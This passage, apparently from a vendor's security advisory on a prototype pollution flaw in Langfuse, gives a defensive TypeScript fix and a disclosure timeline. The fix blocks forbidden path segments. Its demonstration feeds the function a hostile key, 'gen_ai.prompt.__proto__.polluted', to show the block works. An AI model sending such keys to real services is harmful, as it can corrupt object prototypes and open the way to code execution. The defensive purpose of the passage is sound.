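For readers who want a complete function to test against, the pattern above can be assembled into a self-contained sketch. This is not the code from the Langfuse patch: setNestedValueSafe and FORBIDDEN_SEGMENTS are hypothetical names, the whole path is checked up front rather than inside the loop, and the boolean return value and the primitive guard are additions made for this example.

```typescript
const FORBIDDEN_SEGMENTS = new Set(["__proto__", "prototype", "constructor"]);

// Returns true if the value was written, false if the path was rejected.
function setNestedValueSafe(
  obj: Record<string, unknown>,
  path: string[],
  value: unknown,
): boolean {
  // Reject the whole key if any segment, including the last, is forbidden.
  if (path.length === 0 || path.some((s) => FORBIDDEN_SEGMENTS.has(s))) {
    return false;
  }
  let current: any = obj;
  for (let i = 0; i < path.length - 1; i++) {
    const key = path[i];
    // Own-property check: inherited members are never treated as existing.
    if (!Object.prototype.hasOwnProperty.call(current, key)) {
      current[key] = /^\d+$/.test(path[i + 1]) ? [] : {};
    }
    current = current[key];
    // Refuse to descend into primitives left behind by an earlier attribute.
    if (current === null || typeof current !== "object") return false;
  }
  current[path[path.length - 1]] = value;
  return true;
}

const target: Record<string, unknown> = {};
const acceptedLegit = setNestedValueSafe(
  target,
  "gen_ai.prompt.0.role".split("."),
  "user",
);
const acceptedEvil = setNestedValueSafe(
  target,
  "gen_ai.prompt.__proto__.polluted".split("."),
  "YES",
);
const pollutedAfter = ({} as Record<string, unknown>).polluted;

console.log(JSON.stringify(target), acceptedLegit, acceptedEvil, pollutedAfter);
```

Checking the full path before any write means a rejected key leaves no partially built structure behind, at the cost of dropping the attribute entirely.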

Disclosure Timeline

- April 10, 2026: Vulnerability discovered and researched.

- April 10, 2026: RCE and Cross-Project Exposure chains confirmed with PoCs.

- April 11, 2026: Technical report and remediation strategy provided to Langfuse.

- April 16, 2026: Fix verified and environment restored.

Users are advised to upgrade to v3.168.0 or later immediately to protect against these vectors.

About AISafe Labs

We are a security startup building affordable, automated security for web applications.

If you want this kind of coverage for your own codebase, try AISafe.